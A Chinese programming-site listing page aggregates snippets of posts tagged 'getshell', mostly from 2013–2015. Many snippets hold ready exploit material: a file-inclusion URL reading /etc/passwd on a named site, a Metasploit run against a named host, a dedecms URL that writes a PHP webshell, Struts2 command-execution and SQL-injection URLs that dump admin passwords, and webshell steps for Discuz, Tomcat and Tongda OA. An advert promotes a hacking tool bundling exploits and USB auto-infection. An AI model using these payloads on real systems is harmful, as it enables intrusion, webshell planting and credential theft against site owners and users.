E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
GetShell
链家旗下自如某站一个有意思的文件包含到简单内网渗透(本地文件包含
getshell
技巧)
某日组里小伙伴丢来一个链接:http://price.ziroom.com/?_p=../../../../../../../../etc/passwd%00.html说存在本地文件包含,木有上传功能,可以截断怎么破?拿到手第一感觉就是激动,早在很久以前一直就想要做这么一个实例,苦于没有找这样苛刻的环境,一直都没能如愿。我们都知道在向服务器上任意php文件以form-data方式提交请求上传数据时
qq_27446553
·
2015-09-02 15:00
K8飞刀最新版下载 20150725
内置大量漏洞EXP/
GetShell
/0day网马/U盘自动种马/脱库采集工具 支持7种WebShell管理/后台扫描/2级域名扫描/WordPress用户扫描 黑客浏览器/自动
jzking121
·
2015-08-29 21:16
K8下载
K8最新版
K8最终版
K8飞刀最新版下载 20150725
内置大量漏洞EXP/
GetShell
/0day网马/U盘自动种马/脱库采集工具 支持7种WebShell管理/后台扫描/2级域名扫描/WordPress用户扫描 黑客浏览器/自动
jzking121
·
2015-08-29 21:16
K8下载
K8最新版
K8最终版
JS敏感信息泄露:不容忽视的WEB漏洞
而本文将要介绍的JS泄露敏感信息问题也是如此,攻击者不仅可以轻松收集用户手机号,姓名等隐私信息,更可以借此攻入企业后台甚至是
getshell
。本文将通过一些公开和未公开的漏洞详细阐述此类漏洞。
qq_27446553
·
2015-07-09 14:02
JSONP
JS敏感信息泄露:不容忽视的WEB漏洞
而本文将要介绍的JS泄露敏感信息问题也是如此,攻击者不仅可以轻松收集用户手机号,姓名等隐私信息,更可以借此攻入企业后台甚至是
getshell
。本文将通过一些公开和未公开的漏洞详细阐述此类漏洞。
qq_27446553
·
2015-07-09 14:00
elasticsearch某内置功能缺陷利用可能导致
getshell
风险
虽然只是个小问题,但是某些时候还是会存在
getshell
风险详细说明:elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。
qq_27446553
·
2015-07-02 16:00
RF-forwardByKeyboard重写页面跳转
import org.apache.commons.lang.StringUtils; import String com.vtradex.kangaroo.shell.Thorn4BaseShell.
getShell
ByXX
minyongcheng
·
2015-06-25 13:00
keyboard
DigitalOcean的条件竞争漏洞
利用数据库缺陷实现刷乌云币乌云某处刷人民币漏洞成功套现乐视云主站可
getshell
from:http://josipfranjkovic.blogspot.hk/2015/04/race-conditions-on-facebook.html
qq_27446553
·
2015-04-28 16:00
MailBox Step2
上次的mailbox还有一个step2,提示是目录文件下面还有一个flag文件,需要
getshell
。hint也给出了要ret2libc。那么题目意思已经很明白了。可惜我是一只渣,什么都不会。
zh_explorer
·
2015-04-24 12:00
ctf
writeup
pwn
[MSF] DotNetNuke DNNspot Store <=3.0
GetShell
exploit
MSFDotNetNukeDNNspotStoreuseexploit/windows/http/DNNspot_upload_aspx#msfexploit(DNNspot_upload_aspx)>setRHOSTqqhack8.blog.163.com#RHOST=>qqhack8.blog.163.com#msfexploit(DNNspot_upload_aspx)>exploit#[*
a565185325
·
2015-04-18 20:22
MSF
DotNetNuke
DNNspot
S
[MSF] DotNetNuke DNNspot Store <=3.0
GetShell
exploit
MSFDotNetNukeDNNspotStoreuseexploit/windows/http/DNNspot_upload_aspx#msfexploit(DNNspot_upload_aspx)>setRHOSTqqhack8.blog.163.com#RHOST=>qqhack8.blog.163.com#msfexploit(DNNspot_upload_aspx)>exploit#[*
a565185325
·
2015-04-18 20:22
store
dotnetnuke
msf
DNNspot
X升级/转换程序
GETSHELL
漏洞分析
首先感谢尖刀的兄弟分享此漏洞,感谢好基友@园长MM。漏洞原文链接http://p2j.cn/?p=357,看到只有利用没有漏洞分析,这里简单说一下漏洞触发的流程,大牛勿喷。0x01漏洞分析漏洞的根源在代码注释中出现换行,导致代码执行,流程如下:0x0101首先,从index.php第30行跟入。0x0102do_config_inc.php的第37行,跟入这个save_config_file()函
zljmilk
·
2015-01-19 16:23
漏洞
discuz
getshell
U-mail邮件系统又一
getshell
漏洞作者: 路人甲U-mail邮件系统某处处理不当,导致
getshell
详细说明:版本:U-MailforWindowsV9.8.57测试帐号:
[email protected]
测试主机:windowsserver2003
KBK影院
·
2015-01-06 13:18
windows
如何为WordPress做安全防护?
wordpress是国人搭建个人博客的首选,其地位等同于论坛搭建首选discuz(话说,discuz才报出全局变量绕过导致的命令执行大洞,唉,开源的APP都是不产蜜而产
getshell
的蜂巢)wordpress
wdmsyf
·
2014-12-18 09:00
如何为WordPress做安全防护?
wordpress是国人搭建个人博客的首选,其地位等同于论坛搭建首选discuz(话说,discuz才报出全局变量绕过导致的命令执行大洞,唉,开源的APP都是不产蜜而产
getshell
的蜂巢)wordpress
wdmsyf
·
2014-12-18 09:00
wordpress
FoosunCms
getshell
在文件\User\award\awardAction.asp中:code区域Integral=NoSqlHack(request.QueryString("Integral"))ifaction="join"then User_Conn.execute("InsertintoFS_ME_User_Prize(prizeid,usernumber,awardID)values("&CintStr(p
KBK影院
·
2014-12-02 10:56
风讯
foosun
FoosunCms
getshell
在文件\User\award\awardAction.asp中:code区域Integral=NoSqlHack(request.QueryString("Integral"))ifaction="join"thenUser_Conn.execute("InsertintoFS_ME_User_Prize(prizeid,usernumber,awardID)values("&CintStr(pr
KBK影院
·
2014-12-02 10:56
风讯
foosun
exp
Discuz X1.5 X2.5 X3 uc_key
getshell
一、DiscuzX1.5X2.5X3用uc_key来getwebshelluc_key是UC客户端与服务端通信的通信密钥。因此使用uc_key来fetshell只能获取UCenterClient的webshell,即Discuiz!论坛的webshell。如果一个服务器上只有UCenterServer是不能通过uc_key来获取该服务器上的webshell的(不过可以通过uc_key来将服务器上的
KBK影院
·
2014-11-22 18:07
getshell
uc_key
Discuz! 7.2 SQL注入exp
参数:1.可直接
getshell
2.爆管理账号密码3.爆表前缀如果表前缀不是默认的cdb_只需更改代码中的$table即可,方便快捷。
KBK影院
·
2014-11-03 23:19
dz
齐博CMS_V7通杀xss(指哪儿打哪儿)可
getshell
比如短消息处(可指定攻击目标用户)发布文章等地方也用到这个编辑器,同样可以利用0x02_
getshell
齐博cms可以在后台开启静态模式,但是静态文件后缀名可自己定义,换成php后解析无误0x03
KBK影院
·
2014-11-03 19:52
齐博CMS_V7
代码审计:eyou(亿邮)邮件系统两个
getshell
和两个有意思的漏洞
最近在给一家市值过百亿美金的公司做渗透测试,发现其中一个域名用的亿邮邮件系统,就顺便下了套亿邮的源码看了看,发现这套系统的安全性还停留在零几年,问题一大堆,找到一些
getshell
,简单列两个,再拧两个稍微有意思的漏洞分享一下
seay
·
2014-07-23 08:00
代码审计
Seay源代码审计系统
JAVA笔记--初探SWT-2
容器类面板Composite类常用方法:getLayout() 得到布局管理器getLayoutData() 得到布局管理器数据getParent() 得到该容器的父容器
getShell
() 得到该容器的
hoooga
·
2014-07-11 09:43
java
标签
phpcms2008 代码执行 批量
getshell
EXP(使用菜刀)
玩也玩够了,有点鸡肋,会提示此模板没安装等情况..有人发出来了那老衲也发吧谷歌批量还需改进一会儿会补上!原文:http://www.wooyun.org/bug.php?action=view&id=2984测试如下:http://www.90sec.org/yp/product.php?pagesize=${@phpinfo()}测试结果:http://www.cnqiyou.com/yp/pr
佚名
·
2014-05-09 15:33
X2.5最新版后台管理员权限
Getshell
及修复
X2.5最新版后台管理员权限
Getshell
。 1.在后台-->站长-->Ucenter设置处设置UcenterIP为XX\\');eval($_POST[a])?
long7181226
·
2014-04-07 16:28
shell
discuz
源码
管理
javascript
session
Java WebServer 自动部署后门附工具和源码
POST提交:http://xxx.com/xxx.jsp参数:pUBYyDsT=war文件的Basr64编码&oAEICWIo=Test然后请求http://xxx.com/Test就
getshell
loveelva30
·
2014-01-13 14:47
java
null
项目
客户端
通用
初探Metasploit的自动攻击
事先说明,本文实在BT5r3下实现的很抱歉,没
getshell
,不过介绍手法这一目的应该达到了。
xihuanqiqi
·
2014-01-08 15:00
metasploit
渗透
Nessus
msf
X2.5 最新
GetShell
0day 详细利用
X2.5最新
GetShell
0day详细利用听说Discuz!这次又出漏洞了,这次还是个
GetShell
漏洞呀。这个漏洞比较新,应该很多站还没更新吧。
foreverzpk
·
2013-12-07 14:26
图片
文章
source
双引号
根目录
X2.5 最新
GetShell
0day 详细利用
X2.5最新
GetShell
0day详细利用听说Discuz!这次又出漏洞了,这次还是个
GetShell
漏洞呀。这个漏洞比较新,应该很多站还没更新吧。
foreverzpk
·
2013-12-07 14:26
图片
文章
source
网络安全技术
iscsi
noarch.rpm rpm -ivhscsi-target-utils-0.0-5.20080917snap.el5.i386.rpm三:划分分区shell>fdisk /dev/sda 四:配置tar
getshell
jinkaiye
·
2013-11-24 16:10
target
iSCSI
initator
struts2 漏洞测试工具
Struts2远程代码执行漏洞利用工具bulid20130720[+]S2-016 CVE-2013-225 支持
GetShell
/获取物理路径/执行CMD命令[+]S2-013 CVE-2013-
feng27156
·
2013-11-22 10:00
Struts2 S2-016/S2-017 命令执行带回显、看web路径、
getshell
e...
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。喜欢就点一下感谢吧^_^带回显命令执行:http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(newjava.lang.ProcessBuilder(newjava.lang.String[]{'cat','/etc/passwd'}))
BlAckEagle
·
2013-07-18 14:00
dedecms最新版本修改任意管理员漏洞 附
getshell
exp
此漏洞无视gpc转义,过80sec注入防御。补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL?起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。include/dedesql.class.php:if(isset($GLOBALS['arrs1'])) { $v1=$v2=''; for($i=0;isset($arr
itway
·
2013-06-30 19:00
dedecms
dedecms漏洞
getshell
EXP最新可用
构造语句:mytag`(aid,expbody,normbody)VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,””);{/dede:php}’)#@`\’`EXP:http://www.xxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&ar
hbyh
·
2013-06-18 17:30
DEDECMS
mytag
90sec.
安全
dedecms漏洞
getshell
EXP最新可用
构造语句:mytag`(aid,expbody,normbody)VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,””);{/dede:php}’)#@`\’`EXP:http://www.xxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&ar
hbyh
·
2013-06-18 17:30
dedecms
mytag
90sec.php
LFI
Getshell
条件:【条件】在allow_url_include=On且PHP>=5.2.0【优势】直接POSTphp代码并执行【须知】必须使用包含切执行函数(比如includerequire)不能使用file_get_contents等用这些函数不会执行data/input里面函数。【点评】这其实是一种思路而已 当allow_url_include打开的时候 随便找个webshell上传一句话都可以远程包含了
serverxx0
·
2013-06-12 13:29
tips
LFI
discuz 最新后台
getshell
原帖地址内容:http://zone.wooyun.org/content/3894用户–用户栏目–栏目分组–提交–抓包(我就是在这步出错的,一定要提交,不然抓到的数据包不一样)1Content-Disposition:form-data;name="settingnew[profilegroupnew][base][available]"改为1Content-Disposition:form-d
luwenji309
·
2013-05-24 16:05
discuz
getshell
exploit
discuz 最新后台
getshell
原帖地址内容:http://zone.wooyun.org/content/3894用户�C用户栏目�C栏目分组�C提交�C抓包(我就是在这步出错的,一定要提交,不然抓到的数据包不一样)1Content-Disposition:form-data;name="settingnew[profilegroupnew][base][available]"改为1Content-Disposition:fo
luwenji309
·
2013-05-24 16:05
discuz
getshell
帝国cms 后台
getshell
见http://www.wooyun.org/bugs/wooyun-2010-03787以前6.5的有人发的方法是,(进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTdQam
luwenji309
·
2013-05-15 14:08
getshell
帝国cms
exploit
帝国cms 后台
getshell
见http://www.wooyun.org/bugs/wooyun-2010-03787以前6.5的有人发的方法是,(进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTdQam
luwenji309
·
2013-05-15 14:08
getshell
帝国cms
GBBS微论坛
getshell
1.google搜索:inurl:"userinfo.asp?yhm="2.注入exp:直接暴管理员密码/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,6,7,8,9,10,11,12,13,14,15%20from%20yrwl_tb_admin /ad.asp?ad='%20union%20select%
luwenji309
·
2013-05-09 11:00
getshell
gbbs
GBBS微论坛
getshell
1.google搜索:inurl:"userinfo.asp?yhm="2.注入exp:直接暴管理员密码/userinfo.asp?yhm='%20union%20select%201,2,3,yhm%2bchr(35)%2bpass,5,6,7,8,9,10,11,12,13,14,15%20from%20yrwl_tb_admin/ad.asp?ad='%20union%20select%20
luwenji309
·
2013-05-09 11:00
getshell
gbbs
exploit
qibo_v7后台
getshell
后台--系统功能--单篇文章独立页面管理--增加页面--1.标题栏中 2.静态页面名test001.php3.点击提交,点击生成静态4.菜刀连接http://127.0.0.1:8000/qibo/test001.php?test=assert 密码cmd
luwenji309
·
2013-04-24 11:45
getshell
qibo
tomcat 后台
getshell
有些Tomcat安装之后没有修改默认密码(用户名admin/admin),这样就可以直接登录进去。有两个目录可以访问:/admin/manager/html/admin目录下的利用:Service--host--actions--CreateNewContext建立虚拟目录DocumentBase填你想浏览的目录,比如c:\,Path自己随便写,例如/guizai然后直接http://ip/gui
luwenji309
·
2013-04-24 11:52
getshell
tomcat后台
exploit
tomcat 后台
getshell
有些Tomcat安装之后没有修改默认密码(用户名admin/admin),这样就可以直接登录进去。有两个目录可以访问:/admin/manager/html/admin目录下的利用:Service--host--actions--CreateNewContext建立虚拟目录DocumentBase填你想浏览的目录,比如c:\,Path自己随便写,例如/guizai然后直接http://ip/gu
luwenji309
·
2013-04-24 11:52
getshell
tomcat后台
通达OA
getshell
exp:Upload a new file: http://ip:port/general/vmeet/upload/temp/211.php.111
luwenji309
·
2013-04-24 11:35
通达OA
exploit
通达OA
getshell
exp: Upload a new file: http://ip:port/general/vmeet/upload/temp/211.php.111
luwenji309
·
2013-04-24 11:35
通达OA
通达OA 2011-2013 通杀
GETSHELL
转载自T00ls此程序应用于非常多的政府机构,教育机构,以及各大一流公司(中国电信等)!请各位看完本文后不要试图对任何使用本程序的网站进行破坏攻击入侵等…本人发此贴纯属技术交流探讨,并无怂恿别人去尝试攻击的意思!若不接受以上条件的请自觉关闭,由此产生的后果与作者(本人)无关!EXP:第一步: http://ip/general/crm/studio/modules/EntityRel
luwenji309
·
2013-04-24 11:18
getshell
通达OA 2011-2013 通杀
GETSHELL
转载自T00ls此程序应用于非常多的政府机构,教育机构,以及各大一流公司(中国电信等)!请各位看完本文后不要试图对任何使用本程序的网站进行破坏******等…本人发此贴纯属技术交流探讨,并无怂恿别人去尝试***的意思!若不接受以上条件的请自觉关闭,由此产生的后果与作者(本人)无关!EXP:第一步:http://ip/general/crm/studio/modules/EntityRelease/
luwenji309
·
2013-04-24 11:18
getshell
exploit
与虚拟机vxWorks符号表同步的一些经验总结
环境:主机端:Tornado2.2.1,目标机:虚拟机安装的vxWorks5.5.1PCPentium;在TShell(Tar
getShell
)和目标机之间download一个.out文件时:一是遇到TShell
dijkstar
·
2013-03-24 16:00
Target Shell
Target Shell 摘自《VxWorks开发指南与Tornado使用手册》1Tar
getShell
简述 在Tonado开发系统中,整套完整的开发工具在宿主机上驻留并运行,这样减少了目标机内存和资源的开销
orange_os
·
2012-06-14 23:00
上一页
18
19
20
21
22
23
24
25
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他